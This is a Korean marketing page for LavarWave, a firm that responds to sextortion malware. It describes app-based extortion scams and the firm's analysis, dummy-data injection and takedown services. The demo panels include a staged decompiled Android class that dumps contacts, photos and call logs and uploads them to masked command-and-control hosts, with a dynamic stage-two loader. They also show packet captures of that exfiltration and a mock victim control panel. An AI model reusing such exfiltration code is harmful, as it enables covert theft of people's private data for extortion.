1811-9634 전화 상담 간편 상담 신청
라바웨이브 제품 · 서비스 · 자체 개발 기술

탈취는, 접근한 그 순간이미 시작됩니다.

앱 설치와 권한 허용 그 순간부터 데이터 탈취와 협박이 시작됩니다. 라바웨이브의 자체 개발 솔루션이 그 연결을 끊습니다.

정밀 분석 시스템 CS 시스템 라바 스캐너 공개 특허 10건
WEBGL RESPONSE ENGINE · LIVE
Was It A Crime?

내가 당한 게
진짜 범죄가 맞나요?

대부분 여기서 처음 확신을 얻습니다. 처음 말을 걸어온 앱이 어떤 종류였는지 고르면, 그 유형에서 실제로 반복되는 수법이 그대로 재생됩니다.

01어디서 처음 말을 걸어왔나요? 버튼에 마우스를 올리면 아이콘이 펼쳐집니다 — 눌러 보세요.

이 유형의 수법

※ 대화 속에 앱 이름은 쓰지 않습니다. 아이콘은 피해 접수에서 반복 확인된 이동 경로를 알아보기 쉽게 보여주기 위한 것이며, 해당 서비스 자체가 범죄와 관련되어 있다는 뜻이 아닙니다.

랜덤 매칭 채팅무작위 상대 연결
STEP 1 — 첫 접근 · 친밀감 쌓기 · 다른 메신저로 유도
넘어간 개인 메신저1:1 대화
STEP 2 — 옮겨간 뒤 · 앱 설치·파일 다운로드 유도

💡 초록색 화면의 앱·파일 말풍선을 눌러보세요. 설치하면 어떤 화면이 이어지고, 어느 순간 개인정보가 탈취되는지 그대로 보여드립니다.

CRIME EVOLUTION2024.01 → 2026.08 · 11 TURNING POINTS

몸캠피싱 범죄의 진화,
우리의 대응 경험과 노하우

관측 기간 2024.01–2026.08 · 11개 변곡점. 스크롤을 따라 한 항목씩 차례로 지나갑니다.

OFFICIAL SOLUTION 9 TECH · SCROLL CINEMA

보이지 않는 대응 기술이
실제 동작 화면으로 재생됩니다.

라바웨이브 공식 솔루션의 8가지 기술이 스크롤을 따라 순서대로 재생됩니다. 화면 안으로 빨려들어간 뒤 천천히 내려 보세요.

01 · 정밀 분석 시스템 디컴파일

악성 파일·APK 역분석

범행에 사용된 해킹 파일을 리버싱해 전문가가 직접 피해 상황을 진단하고, 맞춤형 통합 솔루션을 제안합니다.

상세 기술 보기 →
EVIDENCE LOCKER수거 악성 APK 28건
스캔 0/28위험 0비식별 연출 데이터
LAVAR REVERSE · JD-GUI COMPAT MODE
×
FileEditNavigateSearchWindowexpogo_v3.4.1.apk · SHA-256 dcf3…9a21
expogo_v3.4.1.apk4.2 MB
com.expo.stream
ui
ads
core
CNetUploader.class
CContactReader.class
CCamService.class
CSmsRelay.class
CPersist.class
util
MAndroidManifest.xml
Dclasses.dex
Rresources.arsc
SMETA-INF/CERT.RSA
NetUploader.classAndroidManifest.xmlContactReader.class
1package com.expo.stream.core;
2
3import android.app.Service;
4import android.content.ContentResolver;
5import android.database.Cursor;
6import android.provider.ContactsContract.Contacts;
7import android.provider.MediaStore.Images.Media;
8import android.telephony.TelephonyManager;
9import dalvik.system.DexClassLoader;
10
11/* 설치 표기 "Video Player" — 실제 동작은 업로더 서비스 */
12public final class NetUploader extends Service {
13
14 /* ── 확보된 C2 인프라 ── */
15 private static final String C2_HOST = "103.***.***.211";C2-HOST
16 private static final int C2_PORT = 8443;C2-PORT
17 private static final String C2_ALT = "cdn-static.***.app";C2-BACKUP
18 private static final String C2_PATH = "/u/contacts";ENDPOINT
19 private static final String AES_KEY = b64("aGxzZGvu***");CRYPT-KEY
20 private static final long BEACON = 20000L; // 20초 주기
21
22 private final List<String> buf = new ArrayList<>();
23
24 public int onStartCommand(Intent it, int f, int id) {
25 startForegroundService(new Intent(this, CamService.class));CAM-HIDDEN
26 grabContacts();
27 grabGallery();
28 grabCallLog();
29 schedule(this, BEACON);
30 return START_STICKY;
31 }
32
33 private void grabContacts() {
34 Cursor c = getContentResolver().query(Contacts.CONTENT_URI,CONTACTS
35 PROJ, null, null, null); // 주소록 전체 덤프
36 while (c.moveToNext()) buf.add(row(c));
37 upload(C2_HOST, C2_PORT, C2_PATH, enc(gz(buf)));C2-PUSH
38 }
39
40 private void grabGallery() {
41 Cursor m = query(Media.EXTERNAL_CONTENT_URI, IMG, null);GALLERY
42 while (m.moveToNext()) push(file(m), "/u/media");
43 }
44
45 private void grabCallLog() {
46 String sn = ((TelephonyManager) sys(TELEPHONY)).getLine1Number();PHONE
47 upload(C2_ALT, C2_PORT, "/u/log", enc(callLog(sn)));C2-BACKUP
48 }
49
50 private void stage2() {
51 new DexClassLoader(dl("/p.dex"), dir, null, cl).loadClass("q.a");DYN-LOAD
52 }
53}
C2 서버 확보103.***.***.211:8443·/u/contacts업로드 루틴 · 백업 C2 확인
STATIC ANALYSIS VERDICT
EVID-01연락처 수집 코드 확인
EVID-02카메라 은닉 촬영 코드 확인
EVID-03C2 통신 루틴 확인
추출 권한 0위험 문자열 0분석 클래스 0판정 MALICIOUS · HIGH비식별 연출 데이터
LAVAR PACKET ANALYZER — live capture · eth0
◇ ▢ ✕
FILTER
tcp.stream eq 7 && ip.dst == 103.***.***.211▸ APPLIED
No.TimeSourceDestinationProtocolLengthInfo
▸ Follow TCP Stream (tcp.stream eq 7) · 1,204 bytes · 8 packets
000050 4f 53 54 20 2f 75 2f 63 6f 6e 74 61 63 74 73POST /u/contacts
001020 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a HTTP/1.1··Host:
002020 31 30 33 2e 2a 2a 2a 3a 38 39 39 39 0d 0a 22 103.***:8999··"
00306e 6f 22 3a 22 30 31 30 2d 2a 2a 2a 2a 22 2c 22no":"010-****","
stream 7 · 1 flagged host · C2 103.***.***.211:8999 비식별 연출 데이터
VICTIM CONTROL PANEL — node07
◇ ▢ ✕
Victims · Control Panel relay-status
http://103.***.***.211:8999/admin/victims
Home / Manage Victims Victims › V-0007 홍길동
ONLINE A
감염 단말1,284
수집 연락처31,204+214
오늘 신규37
활성 세션92LIVE
Victims최근 수신 순
전체ONLINE연락처 200+
ID이름단말 연락처상태최근 수신
V-0007홍길동Galaxy S23 214ONLINE 방금
V-0142김O진Galaxy S24 168ONLINE 12초 전
V-0139이O나iPhone 14 97OFFLINE 3분 전
V-0136박O한Galaxy A54 203ONLINE 5분 전
V-0131오O린Pixel 7 88ONLINE 9분 전
V-0128노O석Galaxy S22 151OFFLINE 14분 전
V-0125황O연Galaxy S23 132ONLINE 18분 전
V-0119임O태iPhone 13 176OFFLINE 22분 전
V-0112신O호Galaxy A34 64ONLINE 27분 전
홍길동 V-0007

010-3***-**37 · Android 14 · Galaxy S23 · 최초 감염 2026-08-21

연락처214
SMS1,027
미디어486
최근 수신방금
연락처 (214)SMS (1,027)미디어 (486)로그
이름관계번호상태
어머니가족010-****-**52노출
어머니가족010-8***-**04보호
김O윤 팀장직장010-****-**17노출
김O윤 팀장직장010-2***-**76보호
박O준친구010-****-**93노출
박O준친구010-9***-**38보호
최O아친구010-****-**21노출
최O아친구010-4***-**60보호
정O우직장010-****-**48노출
정O우직장010-7***-**15보호
강O은친구010-****-**66노출
강O은친구010-3***-**92보호
이모가족010-****-**09노출
이모가족010-5***-**41보호
동생가족010-****-**36노출
동생가족010-6***-**27보호
LAVAR INJECTION
교체된 연락처 0 / 214건
LIFO QUEUE C2 서버 처리 스택
TOP · 가해자 추출 대상
더미 #248무의미 난수
더미 #247무의미 난수
더미 #246무의미 난수
더미 #245무의미 난수
더미 #244무의미 난수
홍길동실제 주소록 · 214건후순위 격하
실제 데이터대화·미디어 기록
삽입된 더미데이터 0건 · 스택 상단 점유
C2 CLUSTER 악성앱 475종 추적 실시간 활동 감시
NEUTRALIZED
LW
LAVARWAVE 차단 게이트 CHARGE00% 악성앱 계정 식별 대기
TAKEDOWN LIVE
차단 요청18
운영정지 완료0/18
정지 처리율0%
협박 채널 차단 유포 채널 차단 수익 루트 차단
INTEGRATED DEFENSE · 관측 2024.05–2026.08 · 비식별 연출 데이터
LAVAR SCANNER — WEB SWEEP ▤ ⤢
https://scanner.lavarwave.io/sweep?mode=live&case=F-0413
소스 12곳 스캔 FRAME 후보 3 큐 대기 214
커뮤니티 게시판c*—community.kr/board/48d02
FRAME MATCH 후보
텔레그램 채널tg:@d***_room · files 41
파일 공유f***share.net/f/9b21f
FRAME MATCH 후보
커뮤니티 게시판t*****board.com/post/48211
SNS 계정s**gram.com/p/citx8
FRAME MATCH 후보
파일 공유f***share.net/f/22e07
수집 1,284DB 31,204의심 3비식별 연출 데이터
FRAME ANALYSIS · #F-0413 특징점 엔진 v2 REC 00:04:13.208
수집 프레임 분석 화면
FEATURE POINTS특징점 128pt 추출
FACE VECTOR HASHa94f:20e1:77c3:5b09
FRAME SIGNATUREv2 · 신뢰도 0.9986
유포 의심 프레임672×282 · H.264 · 수집본
프레임 시그니처 대조LIVE유포 페이지 2곳 특정
t*****board.com/post/48211
96.2%
f***share.net/f/9b21f
93.8%
s**gallery.com/view/7741
34.1%
LAVAR SCANNER ENGINE · 비식별 연출 데이터
DNA FILTERING v3 영역 해시 8블록 대조 변형 감지 모드
원본 프레임
9f3cd471e822b56a
원본 DNA피해 데이터 · FRAME #F-0413
97.8%MATCH
변형 유포본 프레임
9f3cd471e827b56a
변형 유포본무단 필터 · 재인코딩 · 크롭 6%
DNA 일치 — 변형에도 탐지
LAVAR DNA ENGINE · 비식별 연출 데이터
Hyper Cloud Benchmark · HC Series

HC1/HC2/HC3 BenchMark

핵심 기술의 측정 항목과 결과 단위를 벤치마크 보드 한 장에 정리했습니다.

LW BENCHMARK / HYPER CLOUD
BENCHMARK SUITE

핵심 수치

TRACKMEASURERESULT
HC1THREAT CORPUSDATASET SCALE
악성앱·C2 확보·분석위협 유형 분류 데이터
APKC2THREAT
12,500+ANALYZED DATA
HC2HOST CORRELATIONTHROUGHPUT
동시 연결 호스트 탐색상관 분석 처리 기준
HOSTDOMAINSESSION
258/초HOSTS PER SECOND
HC3GLOBAL PROTECTIONRIGHTS RANGE
데이터 인젝션 기술 범위글로벌 특허 출원 기준
PATENTINJECTIONGLOBAL
198개국COUNTRY SCOPE
EXPOGO · 실제 수집 화면

가장 많이 접수된 위장 앱, 설치 직후 이렇게 움직입니다.

수집한 위장 앱 기록에서 EXPOGO는 접수 297건으로 가장 많습니다(관측 2026.04–2026.08 · Android 230 · iOS 67). 아래 단말에 지나가는 다섯 장면은 그 접수 건에서 수집한 실행화면 캡처이며, 유포 QR 코드는 판독할 수 없도록 가렸습니다.

마켓 외부 다운로드 안내 화면
외부 앱 실행 유도 화면 설치 직후 로딩 화면 연락처 접근 권한 요청 다이얼로그 번호 인증 요구 화면
마켓 외부 다운로드 안내 Qspace · 스토어 밖 설치 유도
데이터 전송 경로OUTBOUND 누적 전송 0.0 MB
해외 호스팅패밀리 Expo GoEXPOGO · wahite.onlineC2 137.220.x.181
  1. 01 감염 단말Android · 전화 · 주소록 권한 승인 0 KB/s
  2. 02 유도 도메인wahite.online · EXPOGO 관측 0 KB/s
  3. 03 C2 서버137.220.x.181:15324 · Expo Go 패밀리 0 KB/s
04 C2 웹 관리 패널 http://137.220.x.181:15324/admin/victims
Victims최근 수신 순ONLINE
V-0007홍길동214방금
V-0142김O진16812초
V-0139이O나973분
V-0136박O한2035분
V-0131오O린889분
V-0128노O석15114분
V-0125황O연13218분
수신 레코드 1,284건 · 연락처 31,204건
LAVAR PACKET ANALYZER — live capture · eth0
FILTER
tcp.stream eq 7 && ip.dst == 137.220.x.181▸ APPLIED
No.TimeSourceDestinationProtocolLengthInfo
000050 4f 53 54 20 2f 75 2f 63 6f 6e 74 61 63 74 73POST /u/contacts
001020 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a HTTP/1.1··Host:
002020 77 61 68 69 74 65 2e 6f 6e 6c 69 6e 65 0d 0a wahite.online··
stream 7 · 1 flagged host · 137.220.x.181:15324 IP · 이름 비식별
Malicious App Intelligence

받은 파일, 그 자리에서 확인하세요.

앱 이름·설치 파일·아이콘 캡처 중 무엇이든 놓으면, 라바웨이브가 실제 대응한 위장 앱 기록에서 같은 앱을 찾아 이름을 몇 번 바꿨는지와 함께 묶인 앱까지 펼쳐 보여줍니다.

lavarwave / malicious app intelligence

이름은 계속 바뀌지만, 서버는 그대로입니다.

앱 이름 일부만 입력해도 됩니다. 초성(ㅇㄱ)·영문 표기·오타까지 함께 찾고, 같은 서버에서 이름만 바꿔 다시 나타난 앱을 시간순으로 보여줍니다.

01

서비스

Official Response Process

유포 대응 서비스 프로세스

정확한 피해 상황 진단과 24시간 내 1:1 맞춤 서비스를 진행하며, 작업 종료 이후 사후 모니터링 서비스를 통해 n차 피해 및 추가 유출 방지를 도와드립니다.

STEP 01

피해 상담 및 진단

전문 인력이 즉시 배정되어 피해 상황을 정확히 진단하고, 대응 전략을 세웁니다.

SERVICE PROCESS01 / 03
가해 조직 클러스터
유사 수법 · 계좌 그룹핑
악성앱 클러스터
변종 APK 계열 그룹핑
비식별 연출 데이터
LAVAR CLUSTER ENGINE닉네임 · 수법 · 인프라 연결 분석
STEP 02

솔루션 진행

자체 개발한 세 개의 시스템, 여덟 가지 기술이 피해 유형에 맞춰 투입됩니다.

LAVAR VM — 악성 APK 동적 분석 ×
파일편집가상머신스냅샷도구도움말
12:47LTE  ▂▄▆
LAVAR VM 가상 단말 부팅 중…
메신저형 위장 앱 sample_7f3a.apk
0% 설치 중…
권한 요청 감지
연락처 READ_CONTACTS감지
SMS READ_SMS감지
저장소 READ_STORAGE감지
카메라 CAMERA감지
네트워크 전송 감시 중 후킹 활성 · 전송 함수 계측
차단됨
외부 전송 시도 차단 유출 데이터 0건 · 증거 보존 완료
실시간 분석 로그
게스트: Android 14 (가상 단말) · 스냅샷 #A-7 비식별 연출 데이터
LAVAR PACKET ANALYZER — 실시간 캡처 ×
파일편집보기이동캡처분석통계도움말
tls && dst == c2-●●●.top 필터 적용됨
No.TimeSourceDestinationProtocolInfo
선택 패킷 상세
▾ Frame 1024: 512 bytes on wire · 인터페이스 vnet0
▸ Internet Protocol Version 4 · Src: 10.0.2.16 · Dst: 203.0.113.24
▸ Transmission Control Protocol · Src Port: 52301 · Dst Port: 443
▾ Transport Layer Security — TLSv1.3 Record: Application Data (23)
Content Type: Application Data (23) · Length: 487
캡처 진행 중 — vnet0 (가상 어댑터) 패킷 0 · 표시 0 · 차단 0 비식별 연출 데이터
VICTIM
LAVARWAVE DIGITAL DEFENSE NETWORK
EXTORTION ORGANIZATION
MESSENGERAccounts & Channels
ACCOUNTSFinancial / Crypto
C2 SERVERCommand & Control
BACKUP C2 SERVERBackup Infrastructure
PROTECT DETECT NEUTRALIZE RESTORE
STEP 03 AFTER-CARE

사후 관리

결과를 문서로 정리해 전달하고, 종료 후에도 재유포 신호를 계속 확인합니다.

CASE COMPLETION REPORT

몸캠피싱 유포 대응 완료 보고서

수신 : 의뢰인 귀하 · 발신 : 라바웨이브 초동대응팀 · 보안등급 : 대외비

사건 번호
LW-2608-0412
대응 기간
08.19 – 08.26
담당 조직
초동대응팀
모니터링
D+30 진행중
차단 · 삭제 요청37승인 35 · 처리율 94.6%
탐지 유포 매체12전량 모니터링 등록
추적 C2 인프라6노드수사기관 공유 완료
추가 유포0현재까지 무재발
대응 타임라인
  1. 피해 접수 · 긴급 진단24시간 채널로 접수, 담당자 배정 후 피해 범위 1차 진단.
  2. 악성 앱 정밀 분석격리 환경에서 리버싱 · 패킷 분석, C2 주소와 탈취 경로 확인.
  3. CS 방어 · 유포 차단데이터 인젝션 · 더미데이터 삽입 및 협박 계정 운영정지 요청.
  4. 유포 매체 탐지 · 삭제라바 스캐너로 12개 매체 탐지, 35건 삭제 · 차단 승인.
  5. 완료 보고 · 모니터링 전환결과 분석 보고서 전달, 30일 사후 모니터링 자동 등록.
본 화면은 보고서 양식의 예시 구성이며, 모든 수치 · 식별자는 비식별 연출 데이터입니다.
Integrated Service · CS System

통합 서비스 4종을
영상과 함께 확인하세요

단계를 선택하면 중앙 대형 화면에서 공식 기술 영상이 바로 재생되고, 설명과 상세보기 버튼이 함께 바뀝니다.

01동적 분석
02더미데이터 삽입
03유포 데이터 추적
04네트워크 모니터링
INTEGRATED SERVICE · OFFICIAL CONCEPT

동적 분석

악성 APK의 실행 중 네트워크 패킷을 분석해 C&C 서버 주소와 탈취 데이터 흐름을 확인합니다.

CUSTOMER RESULTC&C 서버 주소와 탈취 데이터 흐름 확인 결과를 대응 범위 진단에 활용합니다.
상세보기
02

제품

COMING SOON

ARIX

차세대 대응 시스템을 준비하고 있습니다.

준비중

HYPER CLOUD V3

대전경찰청과 함께했던
보이스피싱 방지 프로젝트.

우리의 레퍼런스를
눈으로 체험해보세요.

HYPER CLOUD V3

HYPER CLOUD V3

보이스피싱 0% 감소 효과
기록 보기 ↗

Technology Explorer

분석에서 방어, 추적까지.
화면에서 바로 확인하는 기술.

    Technology Explorer

    분석에서 방어, 추적까지.
    화면에서 바로 확인하는 기술.

    유포 대응 단계에서 실제로 투입되는 기술입니다.

    Basic · Premium

    Basic과 Premium,
    구성으로 비교하기.

    기술 영역별로 무엇을 하는 기술인지, 어느 플랜에 어떤 방식으로 담기는지를 구조로 보여드립니다. 실제 포함 범위는 피해 상황 진단 후 상담으로 확정됩니다.

    포함선택·확장
    기술 영역기술 간단 설명BasicPremium
    정밀 분석악성 파일·APK 역분석 · 동적/패킷 분석 의심 파일의 코드·구성 요소를 분해하고, 격리 환경에서 실행·통신 흐름을 관찰해 피해 범위를 확인합니다.
    CS 방어데이터 인젝션 · 더미데이터 삽입 · 통합방어 가상 데이터 생성·전송으로 실제 데이터를 후순위화하고, 협박·유포 상황에 맞는 대응 절차를 연결합니다.
    라바 스캐너웹·SNS 크롤링 · 키워드 · DNA 필터링 유포 가능 페이지를 자동 수집·분류하고, 키워드 신호와 이미지 특징 비교로 변형 콘텐츠까지 추적합니다.
    사후 관리·모니터링 리포트모니터링 서비스 · 결과 분석 · 완료 보고서 대응 종료 후 모니터링 결과를 분석해 완료 보고서로 전달하는 공식 3단계 프로세스의 마지막 단계입니다.

    ※ 실제 포함 범위와 금액은 상담을 통해 확정됩니다.

    LIVE DEMO

    화면에서 본 기술을
    직접 체험해 보세요.

    데이터 인젝션 · 더미데이터 · 라바 스캐너를 브라우저에서 바로 눌러 볼 수 있습니다.

    비식별 연출 데이터 LAVAR SCAN ENGINE